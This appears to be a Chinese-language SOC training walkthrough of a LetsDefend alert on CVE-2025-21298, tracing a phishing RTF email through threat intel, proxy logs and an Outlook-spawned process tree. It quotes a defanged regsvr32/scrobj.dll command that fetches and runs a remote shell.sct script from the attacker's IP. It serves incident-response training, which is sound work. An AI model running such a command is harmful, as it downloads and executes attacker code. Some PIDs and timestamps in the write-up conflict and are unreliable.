SOC336 - Windows OLE 零点击 RCE 漏洞利用检测 (CVE-2025-21298) 演练
(返回顶部)
我们的一名员工Austin收到了一封来自可疑发件人的钓鱼邮件,他在2025年2月4日下午4:18使用Outlook打开该邮件后触发了告警。触发原因为 "检测到恶意RTF附件,带有已知的CVE-2025-21298漏洞利用模式"。
(返回顶部)

事件ID : 314
事件时间 : 2025年2月4日下午4:18(我认为时间有误)
规则 : SOC336 - 检测到Windows OLE零点击远程代码执行漏洞利用 (CVE-2025-21298)
级别 : 安全分析师
SMTP地址 : 84.38.130.118
源地址 : [email protected]
目标地址 : [email protected]
邮件主题 : 重要:即将到来的项目截止日期需要立即行动
附件 : mail.rtf
附件哈希 : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
设备动作 : 允许
触发原因 : 检测到恶意RTF附件,带有已知的CVE-2025-21298漏洞利用模式。
(返回顶部)
(返回顶部)
让我们深入检查邮件安全、日志管理和端点安全日志,以进行告警分类。

我搜索了发件人地址 projectmanagement@pm[.]me,并点击了同一日凌晨5:12发送的邮件"重要:即将到来的项目截止日期需要立即行动"。这让我觉得奇怪,因为"重要"和"需要立即行动"等紧急语气和措辞让我意识到这是一封钓鱼邮件。

我在VirusTotal上搜索了域名 pm[.]me,仅有一家供应商将其判定为可疑。

然而,当我搜索SMTP地址 84[.]38[.]130[.]118 时,有7家供应商将其标记为恶意和恶意软件,并且它与SILVER C2服务器相关。


84[.]38[.]130[.]118 也出现在AbuseIPDB数据库中。它位于拉脱维亚里加,属于域名 rixhost.lv,被归类为DDoS攻击、黑客攻击和被利用主机。

最后,我在VirusTotal上搜索了附件 mail.rtf 的哈希值 df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184,61家供应商中有29家将该附件标记为恶意。它属于恶意软件家族 rtfmalformb,并与漏洞 CVE-2025-21298 相关联。
确认了Austin收到的是一封带有恶意附件的钓鱼邮件。
(返回顶部)
让我们调查一下Austin在凌晨5:12打开钓鱼邮件后是否有可疑活动。

我首先检查了代理日志,搜索了发件人的恶意IP地址 84[.]38[.]130[.]118,发现早上8:06有一条由 cmd.exe 发起的HTTP GET请求,指向该恶意IP地址的URL hxxp://84[.]38[.]130[.]118/shell[.]sct,下载了一个Windows脚本文件。响应代码为200 OK,表明出站流量被允许且未被防火墙阻止。获取一个可能包含反向shell脚本的脚本文件是不正常的。
(返回顶部)


由于向恶意IP地址的出站流量是由 cmd.exe 发起的,我首先检查了终端历史,发现早上8:06:08执行了命令 "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll",该命令衍生出 regsvr32.exe 从恶意IP地址通过 scrobj.dll 获取脚本文件。
使用Windows内置实用程序获取脚本可以在系统上留下最少的痕迹,使逆向工程和恶意软件分析过程更加困难!
(返回顶部)

确认在命令执行事件之后,早上8:06:42与恶意IP 84[.]38[.]130[.]118存在连接。
(返回顶部)
那么为什么仅仅点击一封邮件就会执行 cmd.exe?虽然没有发现Austin下载恶意附件 mail.rtf 的证据,但我检查了端点日志,搜索了早上8:06左右的事件。

进程ID: 7023
事件时间: 2025年2月4日 08:06:25
命令行: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
父进程: cmd.exe

好的,那么让我们看看父进程 cmd.exe
进程ID: 6784
事件时间: 2025年2月4日 08:06:08
命令行: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
父进程: outlook.exe

最后检查了 outlook.exe 的父进程
进程ID: 4820
事件时间: 2025年2月4日 08:05:15
命令行: "C:\Windows\System32\cmd.exe"
父进程: explorer.exe
因此我们可以总结恶意进程树:
explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> 脚本执行!
然而,我仍然质疑恶意进程是如何在没有下载和打开恶意附件的情况下被启动的,以及 outlook.exe 是如何衍生出恶意进程的,直到我发现了关于 CVE-2025-21298 的信息。
(返回顶部)

根据 Offsec 的文章,2025年1月存在一个严重的Windows OLE零点击漏洞,允许通过电子邮件实现远程代码执行,CVSS评分为9.8。当目标收件人仅在Microsoft Outlook中打开或预览包含带有嵌入式脚本的恶意RTF文档时,漏洞被触发,攻击者可以在受影响系统上执行任意代码。
我在Google和Gemini上研究了Windows OLE和RTF文档的劫持过程,并结合我的一些逆向工程知识:
(返回顶部)






未隔离

恶意

已访问







(返回顶部)
分类: 严重
类型: 恶意软件
活动时间:
2025年2月4日 05:12 AM (收到钓鱼邮件)
2025年2月4日 08:05:15 AM - 2025年2月4日 08:06:42 AM (打开钓鱼邮件并执行恶意代码)
受影响实体:
源地址: projectmanagement@pm[.]me
SMTP地址: 84[.]38[.]130[.]118
收件人邮箱地址: Austin@letsdefend[.]io
收件人IP地址: 172[.]16[.]17[.]137
主机名: Austin
确认为真阳性原因:
2025年2月4日凌晨5:12,一封可疑邮件,主题为"重要:即将到来的项目截止日期需要立即行动",由 [email protected] (IP地址: 84.38.130.118) 发送至 [email protected] (IP地址: 172.16.17.137),附件为 mail.rtf (SHA256哈希: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)。主题中使用的紧急语气和措辞暗示这是一封钓鱼邮件。威胁情报平台VirusTotal和AbuseIPDB将发件人IP地址(位于拉脱维亚里加,属于域名 rixhost.lv)和附件标记为恶意和恶意软件。
根据代理日志,早上8:06有一条由 cmd.exe 发起的HTTP GET请求,指向恶意IP地址的URL hxxp://84[.]38[.]130[.]118/shell[.]sct,下载了一个Windows脚本文件。响应代码为200 OK,表明出站流量被允许且未被防火墙阻止。
根据端点安全日志,恶意代码 "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) 由 cmd.exe (PID: 6784) 发起,而 cmd.exe 由 outlook.exe (PID: 4820) 衍生。
该漏洞利用是由一个严重的Windows OLE零点击漏洞 (CVE-2025-21298) 引起的,该漏洞允许通过电子邮件实现远程代码执行,CVSS评分为9.8(2025年1月)。当目标收件人仅在Microsoft Outlook中打开或预览包含带有嵌入式脚本的恶意RTF文档时,漏洞被触发,攻击者可以在受影响系统上执行任意代码,并可能建立到C2服务器的反向shell。
升级原因:
尽管尚未明确观察到活跃的后期利用C2网络流量,但端点安全日志确认了 regsvr32.exe 已使用 scrobj.dll 执行,以获取脚本文件 shell.sct。由于CVE-2025-21298的CVSS评分为9.8,需要进一步调查主机上是否存在任何可疑活动,如持久化或数据泄露。
修复措施:
入侵指标:
(返回顶部)
(返回顶部)